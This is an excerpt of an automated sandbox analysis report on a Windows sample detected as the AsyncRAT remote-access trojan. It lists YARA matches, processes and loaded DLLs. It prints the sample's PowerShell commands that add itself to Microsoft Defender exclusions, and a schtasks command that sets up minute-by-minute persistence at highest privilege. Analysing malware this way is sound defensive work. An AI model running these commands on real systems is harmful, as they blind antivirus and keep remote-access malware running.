            Source: 0.0.aZDwfEKorn.exe.d30000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: 00000000.00000000.1255996540.0000000000D32000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: C:\Users\user\AppData\Roaming\boost, type: DROPPEDMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: aZDwfEKorn.exe, Helper.csCryptographic APIs: 'TransformFinalBlock'
            Source: aZDwfEKorn.exe, Helper.csCryptographic APIs: 'TransformFinalBlock'
            Source: aZDwfEKorn.exe, AlgorithmAES.csCryptographic APIs: 'TransformFinalBlock'
            Source: boost.0.dr, Helper.csCryptographic APIs: 'TransformFinalBlock'
            Source: boost.0.dr, Helper.csCryptographic APIs: 'TransformFinalBlock'
            Source: boost.0.dr, AlgorithmAES.csCryptographic APIs: 'TransformFinalBlock'
            Source: aZDwfEKorn.exe, ClientSocket.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
            Source: aZDwfEKorn.exe, ClientSocket.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: boost.0.dr, ClientSocket.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
            Source: boost.0.dr, ClientSocket.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@21/25@1/2
            Source: C:\Users\user\Desktop\aZDwfEKorn.exeFile created: C:\Users\user\AppData\Roaming\boostJump to behavior
            Source: C:\Users\user\AppData\Roaming\boostMutant created: NULL
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7196:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7952:120:WilError_03
            Source: C:\Windows\System32\OpenWith.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5200:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6308:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7448:120:WilError_03
            Source: C:\Windows\System32\OpenWith.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1272:120:WilError_03
            Source: C:\Users\user\Desktop\aZDwfEKorn.exeMutant created: \Sessions\1\BaseNamedObjects\YS2JAyn2plZCUKxj
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7668:120:WilError_03
            Source: C:\Users\user\Desktop\aZDwfEKorn.exeFile created: C:\Users\user\AppData\Local\Temp\Log.tmpJump to behavior
            Source: aZDwfEKorn.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: aZDwfEKorn.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
            Source: C:\Users\user\Desktop\aZDwfEKorn.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
            Source: C:\Users\user\Desktop\aZDwfEKorn.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: aZDwfEKorn.exeReversingLabs: Detection: 81%
            Source: C:\Users\user\Desktop\aZDwfEKorn.exeFile read: C:\Users\user\Desktop\aZDwfEKorn.exeJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\aZDwfEKorn.exe "C:\Users\user\Desktop\aZDwfEKorn.exe"
            Source: C:\Users\user\Desktop\aZDwfEKorn.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\aZDwfEKorn.exe'
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\aZDwfEKorn.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'aZDwfEKorn.exe'
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\aZDwfEKorn.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\boost'
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\aZDwfEKorn.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'boost'
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\aZDwfEKorn.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "boost" /tr "C:\Users\user\AppData\Roaming\boost"
            Source: C:\Windows\System32\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: unknownProcess created: C:\Users\user\AppData\Roaming\boost C:\Users\user\AppData\Roaming\boost
            Source: unknownProcess created: C:\Windows\System32\OpenWith.exe C:\Windows\system32\OpenWith.exe -Embedding
            Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
            Source: unknownProcess created: C:\Windows\System32\OpenWith.exe C:\Windows\system32\OpenWith.exe -Embedding
            Source: unknownProcess created: C:\Users\user\AppData\Roaming\boost C:\Users\user\AppData\Roaming\boost
            Source: C:\Users\user\Desktop\aZDwfEKorn.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\aZDwfEKorn.exe'Jump to behavior
            Source: C:\Users\user\Desktop\aZDwfEKorn.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'aZDwfEKorn.exe'Jump to behavior
            Source: C:\Users\user\Desktop\aZDwfEKorn.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\boost'Jump to behavior
            Source: C:\Users\user\Desktop\aZDwfEKorn.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'boost'Jump to behavior
            Source: C:\Users\user\Desktop\aZDwfEKorn.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "boost" /tr "C:\Users\user\AppData\Roaming\boost"Jump to behavior
            Source: C:\Users\user\Desktop\aZDwfEKorn.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Users\user\Desktop\aZDwfEKorn.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\aZDwfEKorn.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\aZDwfEKorn.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\aZDwfEKorn.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\aZDwfEKorn.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\aZDwfEKorn.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\aZDwfEKorn.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\aZDwfEKorn.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\Desktop\aZDwfEKorn.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\Desktop\aZDwfEKorn.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\Desktop\aZDwfEKorn.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\aZDwfEKorn.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\aZDwfEKorn.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\aZDwfEKorn.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Users\user\Desktop\aZDwfEKorn.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\aZDwfEKorn.exeSection loaded: edputil.dllJump to behavior
            Source: C:\Users\user\Desktop\aZDwfEKorn.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Users\user\Desktop\aZDwfEKorn.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Users\user\Desktop\aZDwfEKorn.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Users\user\Desktop\aZDwfEKorn.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Users\user\Desktop\aZDwfEKorn.exeSection loaded: windows.staterepositoryps.dllJump to behavior
            Source: C:\Users\user\Desktop\aZDwfEKorn.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\aZDwfEKorn.exeSection loaded: appresolver.dllJump to behavior
            Source: C:\Users\user\Desktop\aZDwfEKorn.exeSection loaded: bcp47langs.dllJump to behavior
            Source: C:\Users\user\Desktop\aZDwfEKorn.exeSection loaded: slc.dllJump to behavior
            Source: C:\Users\user\Desktop\aZDwfEKorn.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\aZDwfEKorn.exeSection loaded: sppc.dllJump to behavior
            Source: C:\Users\user\Desktop\aZDwfEKorn.exeSection loaded: onecorecommonproxystub.dllJump to behavior
            Source: C:\Users\user\Desktop\aZDwfEKorn.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
            Source: C:\Users\user\Desktop\aZDwfEKorn.exeSection loaded: sxs.dllJump to behavior
            Source: C:\Users\user\Desktop\aZDwfEKorn.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Users\user\Desktop\aZDwfEKorn.exeSection loaded: scrrun.dllJump to behavior
            Source: C:\Users\user\Desktop\aZDwfEKorn.exeSection loaded: linkinfo.dllJump to behavior
            Source: C:\Users\user\Desktop\aZDwfEKorn.exeSection loaded: ntshrui.dllJump to behavior
            Source: C:\Users\user\Desktop\aZDwfEKorn.exeSection loaded: cscapi.dllJump to behavior
            Source: C:\Users\user\Desktop\aZDwfEKorn.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Users\user\Desktop\aZDwfEKorn.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Users\user\Desktop\aZDwfEKorn.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\aZDwfEKorn.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Users\user\Desktop\aZDwfEKorn.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Users\user\Desktop\aZDwfEKorn.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Users\user\Desktop\aZDwfEKorn.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\aZDwfEKorn.exeSection loaded: avicap32.dllJump to behavior
            Source: C:\Users\user\Desktop\aZDwfEKorn.exeSection loaded: msvfw32.dllJump to behavior
            Source: C:\Users\user\Desktop\aZDwfEKorn.exeSection loaded: winmm.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
            Source: C:\Users\user\AppData\Roaming\boostSection loaded: mscoree.dll
            Source: C:\Users\user\AppData\Roaming\boostSection loaded: apphelp.dll
            Source: C:\Users\user\AppData\Roaming\boostSection loaded: kernel.appcore.dll
            Source: C:\Users\user\AppData\Roaming\boostSection loaded: version.dll
            Source: C:\Users\user\AppData\Roaming\boostSection loaded: vcruntime140_clr0400.dll
            Source: C:\Users\user\AppData\Roaming\boostSection loaded: ucrtbase_clr0400.dll
            Source: C:\Users\user\AppData\Roaming\boostSection loaded: ucrtbase_clr0400.dll
            Source: C:\Users\user\AppData\Roaming\boostSection loaded: uxtheme.dll
            Source: C:\Users\user\AppData\Roaming\boostSection loaded: sspicli.dll
            Source: C:\Users\user\AppData\Roaming\boostSection loaded: cryptsp.dll
            Source: C:\Users\user\AppData\Roaming\boostSection loaded: rsaenh.dll
            Source: C:\Users\user\AppData\Roaming\boostSection loaded: cryptbase.dll
            Source: C:\Windows\System32\OpenWith.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\OpenWith.exeSection loaded: uxtheme.dll
            Source: C:\Windows\System32\OpenWith.exeSection loaded: onecoreuapcommonproxystub.dll
            Source: C:\Windows\System32\OpenWith.exeSection loaded: windows.storage.dll
            Source: C:\Windows\System32\OpenWith.exeSection loaded: wldp.dll
            Source: C:\Windows\System32\OpenWith.exeSection loaded: twinui.dll
            Source: C:\Windows\System32\OpenWith.exeSection loaded: wintypes.dll
            Source: C:\Windows\System32\OpenWith.exeSection loaded: powrprof.dll
            Source: C:\Windows\System32\OpenWith.exeSection loaded: dwmapi.dll
